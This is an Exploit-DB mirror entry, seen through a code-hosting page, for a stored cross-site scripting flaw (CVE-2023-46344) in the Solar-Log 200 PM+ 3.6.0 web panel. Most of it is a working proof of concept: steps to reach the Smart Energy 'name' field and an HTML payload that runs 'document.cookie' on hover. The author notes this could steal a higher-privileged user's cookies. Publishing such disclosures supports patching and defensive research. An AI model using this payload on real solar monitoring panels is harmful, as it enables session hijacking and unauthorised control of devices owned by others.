bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51857.txt
Exploit-DB 42e75482b6 DB: 2024-03-06 
4 changes to exploits/shellcodes/ghdb

Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 - Stored XSS

kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition

Neontext Wordpress Plugin - Stored XSS
2024-03-06 00:16:30 +00:00

16 lines
No EOL
660 B
Text
Raw Permalink Blame History

# Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel
# Date: 10-30-23
# Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security
# Vendor Homepage: https://www.solar-log.com/en/
# Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019
# Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/
# CVE: CVE-2023-46344
# POC:
1. Go to solar panel
2. Go to configuration -> Smart Energy -> "drag & drop" button.
3. Change "name" to: <xss onmouseenter="alert(document.cookie)"
style=display:block>test</xss>
4. Once you hover over "test", you get XSS -> if a higher privileged
user hovers over it, we can get their cookies.
Reference in a new issue View git blame Copy permalink